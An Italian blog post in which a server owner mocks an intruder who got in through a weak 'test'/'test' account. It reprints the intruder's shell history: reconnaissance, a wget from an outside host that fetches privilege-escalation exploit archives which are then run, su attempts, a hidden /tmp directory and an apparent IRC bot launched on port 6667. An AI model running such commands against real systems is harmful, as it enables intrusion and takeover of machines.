./fuck – Ovvero: forse non ce l’hai fatta a bucarmi la Debian

Geek PowerQuesto server va a morire la settimana prossima. Ne prenderò uno un po’ più potente e voglio provare un altro provider. Vi farò sapere le mie impressioni.

Sto anche facendo un restyling del sito, e dato che serviva un accesso FTP ed io avevo fretta, ho installato proftpd e ho creato un utente “test”, password “test”, per poter far entrare il mio web designer.

Essendo anche un utente di sistema, l’accesso era possibile via SSH. E’ bastato qualche giorno che un hackerino è “riuscito” ad entrare, probabilmente grazie ad uno script kiddies, e ha tentato di rootarmi la Debian.

Com’è andata? Giudicatelo voi:

cat /var/www/test.lucarossi.info/.bash_history
uname -a
/sbin/ifconfig | grep inet -w
ps -x
history
w
who
passwd
passwd
passwd
uname -a
ls
cd /tmp/
ls
wget freewebtown.com/miaumiau/2010.tgz
tar xzvf 2010.tgz
cd 2010
ls
./x86
./0x82 (questa roba è vecchia di ANNI!)
./2009
./2009.c (questa è fantastica)
./run
id
./exploit.c (sublime!!)
ls -a
./run
id
ls -a
cd /home/
ls
ls -a
su ftp
su luca (prrr)
id
cd ..
ls
cd /tmp/
ls -a
ls
cd .ICE-unix/
ls
tar xzvf psyro.tgz.gz
cd .
cd .access.log/
ls
./config maka 6667
./run
./fuck
cd ..
ls
rm -rf psyro.tgz.gz (non hai cancellato un tubo..)
passwd

il ./fuck alla fine non promette niente di nuovo per il poveretto. Proverò ad installare il rootkit che ho trovato in /tmp ma presumo che non funzioneranno. Dopodiché ha cambiato la password ed io ho potuto beccarlo immediatamente.

Che dire? Ai miei tempi noi hackerini s’era molto più svegli!

Leave a Reply

Your email address will not be published. Required fields are marked *